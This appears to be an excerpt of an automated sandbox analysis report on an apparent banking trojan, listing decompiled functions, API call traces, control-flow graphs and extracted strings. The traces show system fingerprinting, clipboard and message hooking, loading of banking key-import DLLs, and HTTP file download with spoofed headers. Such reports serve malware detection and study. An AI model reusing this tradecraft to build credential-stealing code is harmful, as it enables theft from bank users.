                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74B5C
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C74B6F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,02C73EFD,00000000), ref: 02C74B85
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74BAA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74BBC
                                                                                                                                                                                                            • GetSystemDefaultLangID.KERNEL32 ref: 02C74BBE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74BD7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Language: ,0000000B,02C73EFD,00000000), ref: 02C74C45
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74C6A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74C7C
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C74C81
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 02C74C88
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 02C74C91
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 02C74C99
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74CB1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Screen: ,00000009,02C73EFD,00000000), ref: 02C74CCA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74CEF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D01
                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C74D1B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Date: ,00000007,02C73EFD,00000000), ref: 02C74D31
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74D5A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D6C
                                                                                                                                                                                                            • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C74D86
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,02C73EFD,00000000), ref: 02C74D9C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74DC1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74DD3
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?), ref: 02C74DDC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74E3D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{GMT: ,00000006,02C73EFD,00000000), ref: 02C74E56
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74E7B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74E8D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,02C73EFD,00000000), ref: 02C74E9F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,02C73EFD,00000000), ref: 02C74ECF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74EE1
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C74EEF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,?,00000000), ref: 02C74F05
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C74F2A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74F3C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,?,00000000), ref: 02C74F4E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C74F50
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C74F73
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,true,02C73EFD,?,00000000), ref: 02C74F95
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74FA7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C73EFD,00000000,00000000), ref: 02C74FCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C74FDE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Write$System$User$AdminFormatHandleInformationMetricsNameTime_snprintf$CapsCloseCreateDateDefaultDeviceDirectoryEnvironmentLangModuleVariableWindowsZonememset
                                                                                                                                                                                                            • String ID: %c%d:%02d$%dx%d@%d$4.0.1$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                            • API String ID: 113499719-3279427369
                                                                                                                                                                                                            • Opcode ID: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                            • Instruction ID: b2fa6146e9022246d4178943fe94a64be024fc2ff43f79197264d154892d7f77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D226DB1D40218FEEB16DFA4CC89EEEBB7DEF45700F10459AB246A7141E6B45B48CB60
                                                                                                                                                                                                            Function 02C844F0 Relevance: 110.5, APIs: 42, Strings: 21, Instructions: 296libraryloaderthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 249 2c844f0-2c84573 memset GetModuleFileNameA AddVectoredExceptionHandler CreateMutexA CreateThread 250 2c84598-2c845c3 InitializeCriticalSection call 2c81330 LoadLibraryExA 249->250 251 2c84575-2c84589 GetHandleInformation 249->251 256 2c845e1-2c845f0 LoadLibraryExA 250->256 257 2c845c5-2c845cf GetProcAddress 250->257 251->250 252 2c8458b-2c8458f 251->252 252->250 254 2c84591-2c84592 CloseHandle 252->254 254->250 259 2c845f2-2c845fc GetProcAddress 256->259 260 2c84646-2c8465a InitializeCriticalSection GetModuleHandleA 256->260 257->256 258 2c845d1-2c845dc call 2c88fc0 257->258 258->256 259->260 264 2c845fe-2c84618 call 2c88fc0 GetProcAddress 259->264 261 2c84678-2c84691 GetCurrentProcessId call 2c92e00 260->261 262 2c8465c-2c84666 GetProcAddress 260->262 271 2c846d2-2c846e3 LoadLibraryExA 261->271 272 2c84693-2c846b3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 261->272 262->261 265 2c84668-2c84673 call 2c88fc0 262->265 264->260 273 2c8461a-2c84634 call 2c88fc0 GetProcAddress 264->273 265->261 276 2c84701-2c84707 GetCurrentProcessId call 2c92e00 271->276 277 2c846e5-2c846ef GetProcAddress 271->277 272->271 274 2c846b5-2c846c9 lstrcmpiA 272->274 273->260 282 2c84636-2c84641 call 2c88fc0 273->282 274->271 280 2c846cb-2c846d0 call 2c775b0 274->280 284 2c8470c-2c8470e 276->284 277->276 278 2c846f1-2c846fc call 2c88fc0 277->278 278->276 280->276 282->260 287 2c8474c-2c84750 284->287 288 2c84710-2c84730 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 284->288 291 2c848a3-2c848a9 287->291 292 2c84756-2c84776 call 2c882e0 call 2c71670 StrStrIA 287->292 288->287 290 2c84732-2c84746 lstrcmpiA 288->290 290->287 290->291 297 2c84778-2c84788 StrStrIA 292->297 298 2c8478e-2c847a3 LoadLibraryExA 292->298 297->291 297->298 299 2c847f9-2c8482f InitializeCriticalSection call 2c80820 call 2c800b0 call 2c7eeb0 LoadLibraryExA 298->299 300 2c847a5-2c847af GetProcAddress 298->300 315 2c8484d-2c8485a LoadLibraryExA 299->315 316 2c84831-2c8483b GetProcAddress 299->316 301 2c847c1-2c847cb GetProcAddress 300->301 302 2c847b1-2c847bc call 2c88fc0 300->302 305 2c847dd-2c847e7 GetProcAddress 301->305 306 2c847cd-2c847d8 call 2c88fc0 301->306 302->301 305->299 309 2c847e9-2c847f4 call 2c88fc0 305->309 306->305 309->299 318 2c84878-2c84885 LoadLibraryExA 315->318 319 2c8485c-2c84866 GetProcAddress 315->319 316->315 317 2c8483d-2c84848 call 2c88fc0 316->317 317->315 318->291 322 2c84887-2c84891 GetProcAddress 318->322 319->318 321 2c84868-2c84873 call 2c88fc0 319->321 321->318 322->291 324 2c84893-2c8489e call 2c88fc0 322->324 324->291
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02C84527
                                                                                                                                                                                                            • AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD858), ref: 02C8464B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02C84652
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02C84662
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02C76A30,02CC7BA8), ref: 02C84678
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C84693
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C846A8
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C846AF
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C846C1
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C846DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02C846EB
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02C7ABD0,02CBCC94), ref: 02C84701
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C84710
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C84725
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02C8472C
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,92f35800a), ref: 02C8473E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02C84772
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C84784
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C8479D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02C847AB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02C847C7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02C847E3
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02CBD840), ref: 02C847FE
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02C8482B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02C84837
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02C84856
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02C84862
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02C84881
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02C8488D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                            • String ID: .exe$92f35800a$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1248150503-4075828536
                                                                                                                                                                                                            • Opcode ID: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                            • Instruction ID: 30f4eea14a0cac2fd906ffe96af7effc306e659fab77b5ce78b910cc3d23f5b5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9591A071BC035676FA2677B09C4AF9A676D9F80F49F1186A0F502F3080DBA5E6018A79
                                                                                                                                                                                                            Function 02C839C0 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 323memorynetworkfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 705 2c839c0-2c83a05 memset 706 2c83a0b-2c83a0e 705->706 707 2c83d4d-2c83d4f 705->707 706->707 708 2c83a14-2c83a17 706->708 709 2c83d7f-2c83d87 707->709 710 2c83d51-2c83d71 call 2c83620 707->710 711 2c83a19-2c83a1b 708->711 712 2c83a71-2c83a8b InternetOpenA 708->712 716 2c83d76-2c83d7c 710->716 714 2c83a21-2c83a2f 711->714 712->707 715 2c83a91-2c83aac InternetConnectA 712->715 714->714 717 2c83a31-2c83a33 714->717 718 2c83ab2-2c83abb 715->718 719 2c83d43-2c83d4a InternetCloseHandle 715->719 720 2c83a40-2c83a51 717->720 721 2c83abd 718->721 722 2c83ac2-2c83ae2 HttpOpenRequestA 718->722 719->707 723 2c83a53 720->723 724 2c83a55-2c83a5c 720->724 721->722 725 2c83ae8-2c83af6 722->725 726 2c83d39-2c83d40 InternetCloseHandle 722->726 723->724 724->720 727 2c83a5e-2c83a6c call 2c86c40 724->727 728 2c83af8-2c83afc 725->728 729 2c83b0d-2c83b20 HttpAddRequestHeadersA 725->729 726->719 727->712 728->729 733 2c83afe-2c83b0b HttpAddRequestHeadersA 728->733 730 2c83b52-2c83b67 HttpSendRequestA 729->730 731 2c83b22-2c83b50 _snprintf HttpAddRequestHeadersA 729->731 734 2c83d2c-2c83d36 InternetCloseHandle 730->734 735 2c83b6d-2c83b87 HttpQueryInfoA 730->735 731->730 733->729 734->726 735->734 736 2c83b8d-2c83b94 735->736 736->734 737 2c83b9a-2c83bbe CreateFileA 736->737 737->734 738 2c83bc4-2c83bca 737->738 739 2c83bd0-2c83be4 GetProcessHeap RtlAllocateHeap 738->739 740 2c83bea-2c83c17 memset InternetReadFile 739->740 741 2c83c73-2c83c75 739->741 744 2c83c19-2c83c1e 740->744 745 2c83c57-2c83c65 GetProcessHeap HeapValidate 740->745 742 2c83c9a-2c83cac call 2c76570 741->742 743 2c83c77-2c83c8b GetHandleInformation 741->743 753 2c83d29 742->753 754 2c83cb2-2c83cbc 742->754 743->742 747 2c83c8d-2c83c91 743->747 744->745 749 2c83c20-2c83c44 WriteFile GetProcessHeap HeapValidate 744->749 745->741 746 2c83c67-2c83c6d GetProcessHeap HeapFree 745->746 746->741 747->742 750 2c83c93-2c83c94 CloseHandle 747->750 749->739 752 2c83c46-2c83c52 GetProcessHeap HeapFree 749->752 750->742 752->739 753->734 755 2c83cc0-2c83cce 754->755 755->755 756 2c83cd0 755->756 757 2c83cd2-2c83ce3 756->757 758 2c83ce5 757->758 759 2c83ce7-2c83cee 757->759 758->759 759->757 760 2c83cf0-2c83d1b call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 759->760 760->753 765 2c83d1d-2c83d23 GetProcessHeap RtlFreeHeap 760->765 765->753
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83B22
                                                                                                                                                                                                            • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                            • GET, xrefs: 02C83AB6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocateCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 2233330183-2068853992
                                                                                                                                                                                                            • Opcode ID: 96ad48ba908256527a398daa973226683fba8ef25ca08c025694212504682693
                                                                                                                                                                                                            • Instruction ID: e9e0518cfa772f2fcc0f91f2f8754f9ff787320be5ffe8050f190806518866ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96ad48ba908256527a398daa973226683fba8ef25ca08c025694212504682693
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B1FC71A402946BDB11EF64DC89FEF7B78EF48F18F104598FA05A7180D770AA44CBA4
                                                                                                                                                                                                            Function 02C73940 Relevance: 65.3, APIs: 24, Strings: 13, Instructions: 538threadmemorynativeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 824 2c73940-2c7395f 825 2c73965-2c7396a 824->825 826 2c73fd8-2c73fe3 824->826 825->826 827 2c73970-2c73975 825->827 827->826 828 2c7397b-2c73980 827->828 828->826 829 2c73986-2c7398b 828->829 829->826 830 2c73991-2c739b5 829->830 830->826 831 2c739bb 830->831 832 2c739c1-2c739c4 831->832 833 2c73a6e-2c73a72 832->833 834 2c739ca-2c739f3 VirtualQuery 832->834 833->826 837 2c73a78-2c73a85 call 2c73750 833->837 835 2c739f5-2c73a51 VirtualQuery * 2 834->835 836 2c73a5a-2c73a68 834->836 835->836 838 2c73a53 835->838 836->832 836->833 837->826 841 2c73a8b-2c73aac call 2c737c0 VirtualAlloc 837->841 838->836 841->826 844 2c73ab2-2c73ad2 SymSetOptions GetCurrentProcess SymInitialize 841->844 845 2c73ad4-2c73b09 GetCurrentProcess call 2c73830 844->845 846 2c73b0e-2c73b10 844->846 845->846 848 2c73b13-2c73b18 846->848 848->848 849 2c73b1a-2c73b21 848->849 850 2c73b24-2c73b29 849->850 850->850 851 2c73b2b-2c73bc5 call 2c93910 * 2 GetLastError _snprintf call 2c93910 850->851 858 2c73bc7-2c73be3 call 2c93910 * 2 851->858 859 2c73c2f 851->859 858->859 874 2c73be5-2c73beb 858->874 860 2c73c32-2c73c36 859->860 862 2c73c95-2c73cb2 860->862 863 2c73c38-2c73c53 GetCurrentThread ZwQueryInformationThread 860->863 866 2c73cb5-2c73cbb 862->866 863->862 865 2c73c55 863->865 868 2c73c58-2c73c5e 865->868 866->866 869 2c73cbd-2c73ce5 866->869 868->868 871 2c73c60-2c73c90 GetCurrentProcess call 2c73830 868->871 872 2c73ce7-2c73cea 869->872 873 2c73d13-2c73d15 869->873 871->862 872->873 877 2c73cec-2c73cf0 872->877 875 2c73d18-2c73d1d 873->875 878 2c73bf0-2c73bf6 874->878 875->875 880 2c73d1f-2c73d21 875->880 881 2c73cf2-2c73cf6 877->881 882 2c73d0a-2c73d11 877->882 878->878 879 2c73bf8-2c73c2d 878->879 879->860 883 2c73fc7-2c73fd2 VirtualFree 880->883 884 2c73d27-2c73d29 880->884 881->882 885 2c73cf8-2c73d02 GetCurrentProcess call 2c73830 881->885 882->872 882->873 883->826 886 2c73d30-2c73d40 884->886 888 2c73d07 885->888 886->886 889 2c73d42-2c73d54 PathAddBackslashA 886->889 888->882 890 2c73d56-2c73d5b 889->890 890->890 891 2c73d5d-2c73d67 890->891 892 2c73d68-2c73d6e 891->892 892->892 893 2c73d70-2c73d9c PathAddBackslashA call 2c73090 call 2c769d0 892->893 898 2c73da0-2c73db0 893->898 898->898 899 2c73db2-2c73dbe PathAddBackslashA 898->899 900 2c73dc0-2c73dc5 899->900 900->900 901 2c73dc7-2c73dcf 900->901 902 2c73dd0-2c73dd6 901->902 902->902 903 2c73dd8-2c73e54 GetDateFormatA GetTimeFormatA _snprintf 902->903 904 2c73e56-2c73e5b 903->904 904->904 905 2c73e5d-2c73e67 904->905 906 2c73e68-2c73e6e 905->906 906->906 907 2c73e70-2c73e7e 906->907 908 2c73e80-2c73e90 907->908 908->908 909 2c73e92-2c73e9e PathAddBackslashA 908->909 910 2c73ea0-2c73ea5 909->910 910->910 911 2c73ea7-2c73eb1 910->911 912 2c73eb2-2c73eb8 911->912 912->912 913 2c73eba-2c73ecf 912->913 914 2c73ed0-2c73ed6 913->914 914->914 915 2c73ed8-2c73eff call 2c74920 914->915 918 2c73f00-2c73f10 915->918 918->918 919 2c73f12-2c73f1e PathAddBackslashA 918->919 920 2c73f20-2c73f25 919->920 920->920 921 2c73f27-2c73f31 920->921 922 2c73f32-2c73f38 921->922 922->922 923 2c73f3a-2c73f4f 922->923 924 2c73f50-2c73f56 923->924 924->924 925 2c73f58-2c73f85 call 2c93950 call 2c764b0 924->925 925->883 930 2c73f87-2c73f8f 925->930 931 2c73f90-2c73f95 930->931 931->931 932 2c73f97-2c73fc2 call 2c766a0 call 2c93e00 PathAddBackslashA call 2c825c0 call 2c76a10 931->932 932->883
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C739EC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A17
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A3E
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C73A9F
